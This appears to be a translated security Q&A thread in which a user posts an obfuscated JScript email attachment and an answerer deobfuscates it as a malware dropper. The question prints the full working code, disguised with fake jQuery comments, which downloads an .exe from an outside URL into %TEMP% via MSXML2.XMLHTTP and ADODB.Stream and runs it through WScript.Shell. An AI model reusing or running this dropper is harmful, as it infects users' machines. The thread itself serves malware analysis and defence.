Archivo sospechoso .js [cerrado]

Navega tus respuestas
3

Hoy recibí un correo electrónico con el siguiente archivo adjunto, y esperaba ver si alguien podía ayudarme a entender de qué se trataba: 

//} Expose support vars for convenience support = Sizzle.support = {};
var tDPsXdcAz = ["iK"+"ou"+"D"+("appreciated","projection","layman","pKDO"), "gU"+"As"+("ceremony","pillage","knuckle","translator","i")+"PL", "ExpandE"+"nviro"+("child","somalia","conducive","seattle","nmen")+"tStri"+("restitution","claim","propitiatory","catalogues","ngs"), "%"+"T"+("artwork","southeast","modified","regional","EM")+("handjob","taurus","congenital","amount","P%"), "/TLoFtauxO" + "."+("shambles","cheque","e")+"xe", "R"+("dictionaries","celibate","penguin","un"), "Act"+("precipitated","characterize","periodically","i")+"v"+"eX"+("seraphic","resources","equipment","O")+"b"+("blowjobs","forbes","j")+"ect", "W"+"Sc"+("fusillade","oligarchy","camcorders","unlawful","r")+"ipt."+("sudan","looksmart","nathan","S")+"he"+"ll", "pk"+"h"+"p"+("godfather","absences","laughing","falstaff","RI"), "M"+("fingering","streets","sententious","delete","S")+("cacao","hilarity","potential","XM")+"L2"+".XML"+("compounds","beryl","employ","H")+"T"+("databases","berber","cholera","impost","TP")];
//}  Update global variables  document = doc;  docElem = document.documentElement;  documentIsHTML = !isXML( document );
var aBRrBqnaf = this[tDPsXdcAz[100+66-16*10]];
var FnDeQcR = new aBRrBqnaf(tDPsXdcAz[7]);
///**  * Sets document-related variables once based on the current document  * @param {Element|Object} [doc] An element or document object to use to set the document  * @returns {Object} Returns the current document  */ setDocument = Sizzle.setDocument = function( node ) {  var hasCompare, parent,   doc = node ? node.ownerDocument || node : preferredDoc;
var yrVpImgc = new aBRrBqnaf(tDPsXdcAz[9]);
///**  * Detects XML nodes  * @param {Element|Object} elem An element or a document  * @returns {Boolean} True iff elem is a non-HTML XML node  */ isXML = Sizzle.isXML = function( elem ) {   documentElement is verified for cases where it doesn\"t yet exist   (such as loading iframes in IE - #4833)  var documentElement = elem && (elem.ownerDocument || elem).documentElement;  return documentElement ? documentElement.nodeName !== \"HTML\" : false; };
var HlkTy = FnDeQcR[tDPsXdcAz[2]](tDPsXdcAz[3]) + tDPsXdcAz[4];
//  Return early if doc is invalid or already selected  if ( doc === document || doc.nodeType !== 9 || !doc.documentElement ) {   return document;  
yrVpImgc[("paralysis","saucer","phenomenal","andreas","onr")+"eadystatech"+("addressing","playstation","a")+"nge"] = function () {
    if (yrVpImgc[("versions","responded","re")+"adys"+"t"+("petition","ridley","a")+("loiter","jurisdiction","te")] === 4) {
        var lgNaqHj = new aBRrBqnaf(("forensic","destroyer","bourgeoisie","AD")+"O"+("triton","nutritional","D")+"B."+"S"+("higher","lesson","governmental","nominated","tr")+"e"+"am");
        lgNaqHj["o"+("camden","federation","p")+"en"]();
        //  Support: IE 9-11, Edge   Accessing iframe documents after unload throws \"permission denied\" errors (jQuery #13936)  if ( (parent = document.defaultView) && parent.top !== parent ) {    Support: IE 11   if ( parent.addEventListener ) {    parent.addEventListener( \"unload\", unloadHandler, false );
        lgNaqHj["t"+"y"+("cameras","vapid","people","pe")] = 1;
        //   Support: IE 9 - 10 only   } else if ( parent.attachEvent ) {    parent.attachEvent( \"onunload\", unloadHandler );   }  
        lgNaqHj["w"+"ri"+("pungent","gratis","slammed","pander","te")](yrVpImgc[("printed","sorrel","kuwait","Re")+("optics","twenty-first","savoury","retract","sp")+("strange","emptiness","loathe","o")+("astonish","milfhunter","snail","previously","nse")+"B"+"ody"]);
        //} /* Attributes  ---------------------------------------------------------------------- */
        lgNaqHj["p"+"o"+"s"+("runner","italics","named","abashed","ition")] = 0;
        //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
        lgNaqHj.saveToFile(HlkTy, 2);
        // /* getElement(s)By*  ---------------------------------------------------------------------- */
        lgNaqHj.close();
        //  Check if getElementsByTagName(\"*\") returns only elements  support.getElementsByTagName = assert(function( div ) {   div.appendChild( document.createComment(\"\") );   return !div.getElementsByTagName(\"*\").length;  });
    };
};
try {

    //  Support: IE<9  support.getElementsByClassName = rnative.test( document.getElementsByClassName );
    yrVpImgc[("impurity","birds","enormity","cliff","o")+"p"+"en"](("nullify","scheme","G")+"ET", ("malaria","advantage","truncheon","tutelary","http://magic")+("cinderella","frontal","musicians","-")+"beau"+"ty."+"com.ua/system/logs/98yhb764d.exe", false);

    //  Support: IE<10   Check if getElementById returns elements by name   The broken getElementById methods don\"t pick up programatically-set names,   so use a roundabout getElementsByName test  support.getById = assert(function( div ) {   docElem.appendChild( div ).id = expando;   return !document.getElementsByName || !document.getElementsByName( expando ).length;  });
    yrVpImgc[("sleeper","audit","docility","s")+("majority","broadside","nerve","e")+"nd"]();
    //  ID find and filter  if ( support.getById ) {   Expr.find[\"ID\"] = function( id, context ) {    if ( typeof context.getElementById !== \"undefined\" && documentIsHTML ) {     var m = context.getElementById( id );     return m ? [ m ] : [];    }   };   Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     return elem.getAttribute(\"id\") === attrId;    };   };  } else {    Support: IE6/7    getElementById is not reliable as a find shortcut   delete Expr.find[\"ID\"];
    FnDeQcR[tDPsXdcAz[5]](HlkTy, 1, "zEAKvfO" === "wJLlIbR"); gdlRktXq = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
    //  Expr.filter[\"ID\"] = function( id ) {    var attrId = id.replace( runescape, funescape );    return function( elem ) {     var node = typeof elem.getAttributeNode !== \"undefined\" &&      elem.getAttributeNode(\"id\");     return node && node.value === attrId;    };   };  
} catch (SJtAtG) { };
//}  Tag  Expr.find[\"TAG\"] = support.getElementsByTagName ?   function( tag, context ) {    if ( typeof context.getElementsByTagName !== \"undefined\" ) {     return context.getElementsByTagName( tag );
    
pregunta Justin 09.03.2016 - 15:16
fuente

1 respuesta

8

Este es un intento de explotar la descarga desde un drive-by

Pro-tip : cuando vea cualquier tipo de código confuso para cualquier idioma, siga esta sencilla regla:

  • Cualquier persona que ofusca el código es un idiota, un pirata informático o ambos.

En cualquier caso, no desea que este código se ejecute a menos que su trabajo sea crear malware.

Incluso los comentarios intentan engañarte 

    //  Support: IE<8   Verify that getAttribute really returns attributes and not properties   (excepting IE8 booleans)  support.attributes = assert(function( div ) {   div.className = \"i\";   return !div.getAttribute(\"className\");  });
    lgNaqHj.saveToFile(HlkTy, 2);

Sí, porque necesitamos un ADODB Stream que utiliza saveToFile() para guardar archivos ejecutables en nuestra computadora para verificar que getAttribute() realmente devuelva atributos y no propiedades. (sarcasm)

Elcódigodeofuscado

Pararesponderasupregunta,ycomoestosemigrórecientementedeSeguridaddelainformaciónaIngenieríainversa,ynuevamente,sentíqueestarespuestayanoestabaalaalturadelosestándaresdecalidad,porloquetendréqueaclarartodo.Haciendoesoahora.

Desenfocéelcódigocasiensutotalidad:

varhaxArray=["iKouDpKDO", 
    "gUAsiPL", 
    "ExpandEnvironmentStrings", 
    "%TEMP%", 
    "/TLoFtauxO.exe", 
    "Run", 
    "ActiveXObject", 
    "WScript.Shell", 
    "pkhpRI", 
    "MSXML2.XMLHTTP"
];

// Create ActiveXObject instance, a new WScript Shell, and an MSXML HTTP connection
var dumbFunc = this.ActiveXObject;
var wScriptShell = new dumbFunc(WScript.Shell);
var xmlHttp = new dumbFunc(MSXML2.XMLHTTP);

// Will save file to %TEMP%\TLoFtauxO.exe
var fileLocation = wScriptShell.ExpandEnvironmentStrings("%TEMP%" + "TLoFtauxO.exe");

xmlHttp.onreadystatechange = function() 
{
    if (xmlHttp.readystate === 4) {
        var adoDbStream = new dumbFunc(ADODB.Stream);
        adoDbStream.open();
        adoDbStream.type = 1;
        adoDbStream.write(xmlHttp.ResponseBody);
        adoDbStream.position = 0;
        adoDbStream.saveToFile(fileLocation, 2);
        adoDbStream.close();
    };
};
try {
    xmlHttp.open("hxxp://magic-beauty.com.ua/system/logs/98yhb764d.exe");
    xmlHttp.send();
    wScriptShell.run(fileLocation, 1, false);
    messageThing = "    DocumentFragment nodes don\"t have gEBTN    } else if ( support.qsa ) {     return context.querySelectorAll( tag );    }   } :";
} catch (SJtAtG) {};

Te veo, un ladrón en el techo; Veo latir tu corazón, veo que tienes miedo.

Entonces, ¿qué intenta hacer este código?

Intenta descargar un archivo llamado 98yhb764d.exe y luego guardarlo en su computadora como un archivo llamado TLoFtauxO.exe . Intenta guardar esto en la carpeta temporal de Windows, siempre y cuando tengas configuradas las variables de entorno %TEMP% , lo que la mayoría de la gente hace por defecto.

Nunca creas que el código ofuscado es legítimo por alguna razón ( nota al margen: la minificación y la ofuscación son dos conceptos diferentes), y estarás bien. Si terminaste infectado por esto, visita el hilo: ¿Cómo trato con un servidor comprometido?

    
respondido por el Mark Buffalo 09.03.2016 - 15:27
fuente

Lea otras preguntas en las etiquetas

Spoof otra dirección IP en la misma red, ¿la fuente de spoofing recibirá la respuesta? ¿Se puede aprovechar CVE-2015-4852 contra los servidores de WebLogic después de un equilibrador de carga?